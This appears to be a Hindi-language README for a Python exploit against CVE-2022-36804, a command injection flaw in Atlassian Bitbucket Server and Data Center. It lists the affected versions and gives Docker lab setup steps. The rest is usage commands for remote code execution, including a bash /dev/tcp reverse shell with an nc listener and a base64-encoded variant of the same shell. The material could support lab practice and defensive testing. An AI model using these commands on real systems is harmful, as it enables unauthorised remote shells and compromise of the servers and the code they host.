
CVE-2022-36804 कमांड इंजेक्शन के लिए Python exploit, जो Atlassian Bitbucket Server में अनुकूलन योग्य कमांड और Docker लैब वातावरण के साथ दूरस्थ कोड निष्पादन और रिवर्स शेल को सक्षम बनाता है।
Atlassian Bitbucket Server और Data center के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन कमजोरी पाई गई है। यह कमजोरी Bitbucket Server और Data Center के उन सभी संस्करणों को प्रभावित करती है जो <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, और <8.3.1 संस्करणों से पहले जारी किए गए थे।
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
172.17.0.3 को अपने स्थानीय IP पते से बदलें
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
https://www.revshells.comपेलोड एक्ज़ीक्यूशन त्रुटि के मामले में `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` को base64 में बदलें।
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
अभ्यास के लिए Windows/Linux मशीन में Bitbucket सर्वर का कमजोर संस्करण स्थापित करने की सिफारिश की जाती है। Docker इमेज की तुलना में रिवर्स शेल प्राप्त करना आसान होगा।
अधिक जानकारी [यहाँ](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/) पाई जा सकती है।
# संदर्भ
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804